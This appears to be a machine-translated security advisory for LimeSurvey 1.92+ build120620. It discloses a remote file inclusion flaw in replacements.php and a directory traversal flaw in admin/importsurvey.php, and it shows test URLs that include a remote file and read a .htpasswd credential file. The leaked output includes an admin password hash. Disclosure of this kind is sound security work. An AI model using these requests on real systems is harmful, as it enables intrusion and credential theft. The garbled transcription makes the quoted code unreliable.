LimeSurvey 1.92 + build120620 multiple defects and repair

Discoverer dun \ posdub [at] gmail.com
 
[LimeSurvey 1.92 + build 120620] Multiple Vulnerabilities #
 
Impact program: "LimeSurvey-the free and open source survey software tool"
 
Official Website: http://www.limesurvey.org/
: Http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip
 
 
# [RFI] (allow_url_include = On; register_globals = On ;)
 
Affected Versions: 1.92 + build 120620
 
Test: http://www.bkjia.com/limesurvey/replacements. php? Rootdir = http: // localhost/phpinfo.txt?
 

 
File:./limesurvey/replacements. php (line 3)
 
... Cut...
 
<? Php
 
Global $ rootdir;
 
Include_once ($ rootdir. '/classes/expressions/LimeExpressionManager. php'); // [RFI]
 
... Cut...
 

 
 
# [Directory traversal] (display_errors On; register_globals = On ;)
 
Affected Versions: 1.92 + build 120620 and previous
 
#
 
Test: http://www.bkjia.com/limesurvey/admin/importsurvey. php? Copyfunction = 1 & sExtension = lss & sFullFilepath =.../../secret/. htpasswd
 
File:./limesurvey/admin/importsurvey. php (lines 18-38)
 
... Cut...
 
If ((! Isset ($ importingfrom )&&! Isset ($ copyfunction) | isset ($ _ REQUEST ['importingfrom']) // 1 false if $ copyfunction is set
 
{
 
Die ("Cannot run this script directly ");
 
}
 
Require_once ('import _ functions. php'); // 2 include functions
 
If (! Isset ($ copyfunction ))
 
{
 
$ SFullFilepath = $ the_full_file_path;
 
$ APathInfo = pathinfo ($ sFullFilepath );
 
$ SExtension = $ aPathInfo ['extension'];
 
}
 
$ BImportFailed = false;
 
If (isset ($ sExtension) & strtolower ($ sExtension) = 'csv ')
 
{
 
$ AImportResults = CSVImportSurvey ($ sFullFilepath );
 
}
 
Elseif (isset ($ sExtension) & strtolower ($ sExtension) = 'lss') // 3 true if $ sExtension = 'lss'
 
{
 
$ AImportResults = XMLImportSurvey ($ sFullFilepath, null, (isset ($ _ POST ['translinksfields ']); // 4 $ sFullFilepath-> our file
 
... Cut...
 
File:./limesurvey/admin/import_functions.php (lines 1080-1087)
 
... Cut...
 
Function XMLImportSurvey ($ sFullFilepath, $ sXMLdata = NULL, $ sNewSurveyName = NULL, $ iDesiredSurveyId = NULL, $ bTranslateInsertansTags = true)
 
{
 
Global $ connect, $ dbprefix, $ clang, $ timeadjust;
 
$ Results ['error'] = false;
 
If ($ sXMLdata = NULL)
 
{
 
$ Xml = simplexml_load_file ($ sFullFilepath); // 5 try to open our file as xmlfile
 
... Cut...
 
This shoshould return a warning with the first line of our file.
 
In this case: admin: $ apr1 $ zq2Yh9mB $ R9WIiMX4YwOnhDon1kvc5/from. htpasswd :)
 
Something like this:
 

 
Warning: simplexml_load_file () [function. simplexml-load-file]:
 
.../Secret/. htpasswd: 1: parser error: Start tag expected, '<' not found in/www/limesurvey/admin/import_functions.php on line 1087
 
Www.2cto.com Warning: simplexml_load_file () [function. simplexml-load-file]:
 
Admin: $ apr1 $ zq2Yh9mB $ R9WIiMX4YwOnhDon1kvc5/in/www/limesurvey/admin/import_functions.php on line 1087
 
Warning: simplexml_load_file () [function. simplexml-load-file]:
 
^ In/www/limesurvey/admin/import_functions.php on line 1087 ##